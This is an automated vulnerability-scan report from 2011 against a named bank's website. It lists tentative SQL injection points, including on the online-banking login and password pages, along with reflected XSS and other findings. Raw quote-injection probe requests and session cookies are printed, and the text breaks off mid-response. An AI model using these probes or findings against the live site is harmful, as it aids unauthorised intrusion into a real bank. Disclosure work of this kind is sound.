XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, www.bbt.com

Report generated by XSS.CX at Mon Jun 20 14:41:34 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

1.1. http://bbt.com/bbt/about/ [REST URL parameter 1]

1.2. http://bbt.com/bbt/about/ [REST URL parameter 2]

1.3. http://bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html [REST URL parameter 1]

1.4. http://bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html [REST URL parameter 2]

1.5. http://bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html [REST URL parameter 3]

1.6. http://bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html [REST URL parameter 4]

1.7. http://bbt.com/bbt/careers/ [REST URL parameter 1]

1.8. http://bbt.com/bbt/careers/ [REST URL parameter 2]

1.9. http://bbt.com/bbt/careers/panel/quotes.xml [REST URL parameter 1]

1.10. http://bbt.com/bbt/careers/panel/quotes.xml [REST URL parameter 2]

1.11. http://bbt.com/bbt/careers/panel/quotes.xml [REST URL parameter 3]

1.12. http://bbt.com/bbt/careers/panel/quotes.xml [REST URL parameter 4]

1.13. http://bbt.com/bbt/contactus/personal.html [REST URL parameter 1]

1.14. http://bbt.com/bbt/contactus/personal.html [REST URL parameter 2]

1.15. http://bbt.com/bbt/contactus/personal.html [REST URL parameter 3]

1.16. http://bbt.com/bbt/online-banking/enter-password.html [REST URL parameter 1]

1.17. http://bbt.com/bbt/online-banking/enter-password.html [REST URL parameter 2]

1.18. http://bbt.com/bbt/online-banking/enter-password.html [REST URL parameter 3]

1.19. http://bbt.com/bbt/online-banking/forgot-user-id.html [REST URL parameter 1]

1.20. http://bbt.com/bbt/online-banking/forgot-user-id.html [REST URL parameter 2]

1.21. http://bbt.com/bbt/online-banking/forgot-user-id.html [REST URL parameter 3]

1.22. http://bbt.com/bbt/sitemap.html [REST URL parameter 1]

1.23. http://bbt.com/bbt/sitemap.html [REST URL parameter 2]

2. Cross-site scripting (reflected)

2.1. http://bbt.com/bbt/about/ [name of an arbitrarily supplied request parameter]

2.2. http://bbt.com/bbt/careers/ [name of an arbitrarily supplied request parameter]

2.3. http://bbt.com/bbt/contactus/personal.html [name of an arbitrarily supplied request parameter]

2.4. http://bbt.com/bbt/sitemap.html [name of an arbitrarily supplied request parameter]

3. Cross-domain script include

3.1. http://bbt.com/bbt/about/

3.2. http://bbt.com/bbt/careers/

3.3. http://bbt.com/bbt/contactus/personal.html

3.4. http://bbt.com/bbt/sitemap.html

4. Cookie without HttpOnly flag set

4.1. http://bbt.com/bbt/css/topNav.css

4.2. http://bbt.com/bbt/images/globalnav/bbt-logo-top.gif

4.3. http://bbt.com/bbt/images/icons/ELH.gif

4.4. http://bbt.com/bbt/images/icons/print3.gif

4.5. http://bbt.com/bbt/images/shim.gif

4.6. http://bbt.com/bbt/images/topnav/bbt_business.gif

4.7. http://bbt.com/bbt/images/topnav/bbt_customer_service.gif

4.8. http://bbt.com/bbt/images/topnav/bbt_learnplan.gif

4.9. http://bbt.com/bbt/images/topnav/bbt_personal.gif

4.10. http://bbt.com/bbt/images/topnav/online_banking_login_top.gif

4.11. http://bbt.com/bbt/includes/javascript/AC_RunActiveContent.js

4.12. http://bbt.com/bbt/includes/javascript/SpryEffects.js

4.13. http://bbt.com/bbt/includes/javascript/browserDetect.js

4.14. http://bbt.com/bbt/includes/javascript/new_window.js

4.15. http://bbt.com/bbt/includes/javascript/swapimage.js

4.16. http://bbt.com/bbt/touchclarity/s_code.js

5. Email addresses disclosed

5.1. http://bbt.com/bbt/careers/

5.2. http://bbt.com/bbt/contactus/personal.html

5.3. http://bbt.com/bbt/includes/javascript/xpath.js

6. Robots.txt file



1. SQL injection  next
There are 23 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://bbt.com/bbt/about/ [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/about/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt'/about/ HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_cc=true; s_nr=1308598493694; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:35:47 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/about/ HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_cc=true; s_nr=1308598493694; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:35:47 GMT
location: http://bbt.com/bbt/%27%27/about/
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 135
cache-control: private
x-powered-by: ASP.NET
Content-Length: 139

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/about/">here</a>.</body>

1.2. http://bbt.com/bbt/about/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/about/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt/about'/ HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_cc=true; s_nr=1308598493694; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:35:52 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/about''/ HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_cc=true; s_nr=1308598493694; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:35:52 GMT
location: http://bbt.com/bbt/about%27%27/
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 134
cache-control: private
x-powered-by: ASP.NET
Content-Length: 138

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/about%27%27/">here</a>.</body>

1.3. http://bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/about/privacyandsecurity/onlinebankinglogin.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt'/about/privacyandsecurity/onlinebankinglogin.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:36:05 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/about/privacyandsecurity/onlinebankinglogin.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:36:05 GMT
location: http://bbt.com/bbt/%27%27/about/privacyandsecurity/onlinebankinglogin.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 177
cache-control: private
x-powered-by: ASP.NET
Content-Length: 181

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/about/privacyandsecurity/onlinebankinglogin.html">here</a>.</body>

1.4. http://bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/about/privacyandsecurity/onlinebankinglogin.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt/about'/privacyandsecurity/onlinebankinglogin.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:36:10 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/about''/privacyandsecurity/onlinebankinglogin.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:36:10 GMT
location: http://bbt.com/bbt/about%27%27/privacyandsecurity/onlinebankinglogin.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 176
cache-control: private
x-powered-by: ASP.NET
Content-Length: 180

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/about%27%27/privacyandsecurity/onlinebankinglogin.html">here</a>.</body>

1.5. http://bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/about/privacyandsecurity/onlinebankinglogin.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt/about/privacyandsecurity'/onlinebankinglogin.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:36:14 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/about/privacyandsecurity''/onlinebankinglogin.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:36:14 GMT
location: http://bbt.com/bbt/about/privacyandsecurity%27%27/onlinebankinglogin.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 176
cache-control: private
x-powered-by: ASP.NET
Content-Length: 180

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/about/privacyandsecurity%27%27/onlinebankinglogin.html">here</a>.</body>

1.6. http://bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/about/privacyandsecurity/onlinebankinglogin.html

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt/about/privacyandsecurity/onlinebankinglogin.html' HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:36:18 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/about/privacyandsecurity/onlinebankinglogin.html'' HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598541335; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:36:18 GMT
location: http://bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 176
cache-control: private
x-powered-by: ASP.NET
Content-Length: 180

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/about/privacyandsecurity/onlinebankinglogin.html%27%27">here</a>.</body>

1.7. http://bbt.com/bbt/careers/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bbt.com
Path:   /bbt/careers/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt'/careers/ HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598534372; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Mon, 20 Jun 2011 19:35:53 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15425
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/careers/ HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598534372; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Mon, 20 Jun 2011 19:35:53 GMT
